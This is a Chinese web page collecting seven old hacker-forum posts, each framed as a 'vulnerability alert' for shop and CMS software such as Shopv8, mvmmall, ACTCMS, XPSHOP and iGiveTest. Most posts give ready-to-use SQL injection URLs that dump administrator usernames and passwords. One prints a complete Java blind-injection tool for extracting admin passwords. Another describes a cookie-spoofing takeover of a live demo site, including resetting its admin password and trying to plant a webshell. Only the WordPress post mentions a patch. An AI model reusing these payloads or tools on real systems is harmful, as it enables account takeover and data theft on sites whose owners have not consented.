Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警

时间:2022-11-25 18:31:08 作者:MoverH 综合材料 收藏本文 下载本文

“MoverH”通过精心收集,向本站投稿了7篇Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警,以下是小编帮大家整理后的Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警,仅供参考,欢迎大家阅读。

篇1:Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警

Shopv8 商城系统 v12.07,程序下载:www.mycodes.net/20/1099.htm

漏洞文件:list.asp

127.0.0.1/list.asp?id=338

注入中转爆帐号密码

127.0.0.1:808/jmCook.asp?jmdcw=338%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,password,username,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52%20from%20admin

测试的时候关闭js脚本,不然会跳转的,

Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警

转自:www.90sec.org/thread-2883-1-1.html

篇2:mvmmall网店商城系统注入漏洞漏洞预警

mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上,

代码如下:

require_once ‘include/common.inc.php’;

require_once ROOTPATH.’header.php’;

if($action!=’search’){

$search_key = ”;

if (isset($ps_search))

{  //省略一堆东西

$tag_ids = array; //在if里

//继续省略

while ($row = $db->fetch_array($result)) {

$tag_ids[] = $row['goods_id'];

} //也是在if里

}

//省略一堆东西

} //结束if里的东西

//商品标签搜索

$tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入

$tag_search = implode(‘,’,dhtmlchars($tag_ids));   //dhtmlchars过滤HTML标签不用理会

$tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了!

//省略无关东西

$search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的….

$total_count = $db->counter($mvm_goods_table,$search_sql);

用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了,

测试EXP:

www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23

BY:www.dj4now.com/

篇3:ACTCMS注入漏洞漏洞预警

一款ASP的CMS程序,用的人并不是太多。

GOOGLE一下关键字“Copyright @ www.actcms.com” ,不是太多。

今天看了一下代码。

基本上所有的参数全都被过滤掉了。。

不过投票那里出了点小问题。。

在/plus/vote/vote.asp页面。

代码如下:

ASP/Visual Basic代码

....

if request(“voted”).count=0 then

response.write “”

response.end

end if

for i=1 to request(“voted”).count

actcms.actexe(“Update vote_act set VoteNum=VoteNum+1 where id=”&request(“voted”)(i))

next

....

response.Redirect “index.asp?id=”&id&“”

id直接从request里面取的,不过因为前面是update ,再加上后面的response.redirect,利用起来比较麻烦。而且这是一个一般工具无法识别的注入点。因为无论我们构造什么语句在后面,它都会跳到index.asp页面。

唯一有变化的就是当我们构造的注入条件正确的时候,票数会增加。 手工利用起来相当的麻烦,试了现在的那些注入工具明小子,pangolin之类的也不能注入,所以我自己动手写了一个简单的程序 ,因为只会JAVA,所以就用JAVA写了。。写的比较粗糙。用的穷举法,这样写着比较方便。速度慢就慢吧。

代码如下:

Java代码

import java.io.BufferedReader;

import java.io.InputStreamReader;

import java.net.URL;

import java.net.URLConnection;

import java.util.regex.Matcher;

import java.util.regex.Pattern;

public class ActCmsGetPwd {

public static char[] arr = { '0', '1', '2', '3', '4', '5', '6', '7', '8',

'9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',

'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',

'z' };

public static String siteurl = “”;

public static int voteid = 1;

public static String charset = “”;

public static void main(String[] args) throws Exception {

if (args.length < 4) {

System.out

.println(“usage:java ActCmsGetPwd    ”);

System.out.println(“siteurl:目标站点”);

System.out.println(“voteid:投票id”);

System.out

.println(“totalVoteNum:当前的投票人数,请自行查看plus/vote/index.asp?id=”);

System.out.println(“charset:目标站点所用的ACTCMS的字符集,请自行查看网页源代码”);

System.out.println(“eg:java ActCmsGetPwd www.abc.com/ 1 15 gb2312”);

return;

}

siteurl = args[0];

voteid = Integer.parseInt(args[1]);

int preVoteNum = Integer.parseInt(args[2]);

charset = args[3];

System.out.println(“Code by Ninty , QQ 3191864”);

System.out.print(“password is :”);

for (int i = 1; i <= 16; i++) {

System.out.print(send(i, 0, preVoteNum));

preVoteNum++;

}

System.out.println(“nDone!”);

}

public static char send(int a, int b, int preVoteNum) throws Exception {

String sql = “%20and%20(select%20top%201%20mid(password,” + a

+ “,1)%20from%20admin_act%20where%20supertf%20=1)%20=%20'” + arr[b] + “'”;

URL u = new URL(siteurl

+ “/Plus/vote/vote.asp?dopost=send&id=”+voteid+“&ismore=0&voted=3” + sql);

URLConnection conn = u.openConnection();

BufferedReader reader = new BufferedReader(new InputStreamReader(conn

.getInputStream(),charset));

String str = reader.readLine();

while (str != null) {

if (str.indexOf(“ 投票人数:”) != -1) {

break;

}

str = reader.readLine();

}

reader.close();

if (!isRight(str, preVoteNum)) {

return send(a, ++b, preVoteNum);

} else {

return arr[b];

}

}

public static boolean isRight(String str, int preVoteNum) {

if (str == null) {

System.out.println(“无法读取!”);

System.exit(0);

}

Pattern pat = Pattern.compile(“人数:(d+)”);

Matcher mat = pat.matcher(str);

if (mat.find()) {

int num = Integer.parseInt(mat.group(1));

if (num != preVoteNum) {

return true;

}

}

return false;

}

}

下面是已经编译好的 class文件,编译环境JDK6,

直接运行就好。

actcmsgetpwd.class

在网上找了几个站测试了一下,都可以得到超级管理员的密码,不过官网好像不存在这个漏洞。

篇4:XPSHOP商城系统Cookies欺骗漏洞漏洞预警

文章作者:121711090

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..

这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...

但为了我们的网络更安全..还是看看吧...

首先先看看这个站吧:demo1.xpshop.cn/

先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704

好..还是用啊D打开网站比较好..看截图:记得要保留cookies

之后便看看他的Cookies...

代码:

LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14

我们改一下这两个值:LoginCode=0684;mid=14 .......都改成1  :

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..

之后就成这样了:

当然..也有可能没有..那我们就要改一下:“ASP.NET_SessionId=” 这个值就好了..随便改一个字就行:如下:

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

好了..现在再看看会员信息:

是不是有一个“找回密码答案:”呵.....个位都想到了吧..直接就能改管理员密码了..

demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..

如下图:

成功.....demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..

可是我一直没弄成..理论是只有这样才行..看..

先插马..再备份..但这里出错了..

还望达人能想出更好的办法..

我想了一晚上了....没辙了....

demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 这可以列目录

好..就那么多了....有哪位达人弄出好办法了..千万别望了告诉我呀...联系方式:blog.sina.com.cn/qq1217

demo1.xpshop.cn/helps/t.txt

添加flash广告处可直接上传马

营销管理 - flash广告添加

篇5:WordPress 3.1.3 注入漏洞漏洞预警

第一个:

get_terms过滤器文件中声明taxonomy.php 没有正确验证用户输入,允许攻击者构建任意sql命令,可用于盲注,

以下网址可用于执行SQL盲注攻击

[SQL injection] sql注入

localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL

injection]&order=[SQL injection]

localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL

injection]&order=[SQL injection]

localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL

injection]&order=[SQL injection]

第二个:

get_bookmarks()函数中声明的

bookmark.php文件没有正确验证用户输入

这个也可以盲注

以下网址可用于执行SQL盲注攻击

localhost/wp-admin/link-manager.php?orderby=[SQLinjection]&order=[SQL injection]

WordPress已经确认漏洞存在了

漏洞解决:

升级到3.1.4 或者 3.2-RC3版本,

篇6:iGiveTest 2.1.0注入漏洞漏洞预警

Version: <= 2.1.0

# Homepage: iGiveTest.com/

谷歌关键字: “Powered by iGiveTest”

随便注册一个帐号,

iGiveTest 2.1.0注入漏洞漏洞预警

然后暴管理员帐号和密码

www.xxxx.com/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1

篇7:simplelog v1.3.1 注入漏洞漏洞预警

Simple-Log是基于PHP+MySQL的开源免费博客系统,系统轻巧运行速度飞快并具有很好的可扩展性.

程序下载down.cnzz.cn/Info/57357.aspx

----------------------------------------------

刚买到vps,打算装个blog系统,看到simple-log比较简洁,就下了最新的装了,,

simplelog v1.3.1 注入漏洞漏洞预警

谁知道,偶刚装好,到前台看到搜索就搜了下,没想到真有洞,urldecode()惹的祸。

试了下,真可以爆啊,无语了。

再上一张图吧,数据依然可以爆掉。

魔方网络摄影系统注入漏洞及利用和修复

DirCMS 任意文件读取0day漏洞预警

最土团购系统盲注及cookie欺骗漏洞漏洞预警

Andys PHP Knowledgebase 0.95.4 SQL注入漏洞及修复

漏洞整改报告

micecms一个鸡肋漏洞及修复 附EXP漏洞预警

EasyTalk 微博本地文件包含漏洞漏洞预警

ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警

永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警

规章制度执行有漏洞

Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警(精选7篇)

欢迎下载DOC格式的Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档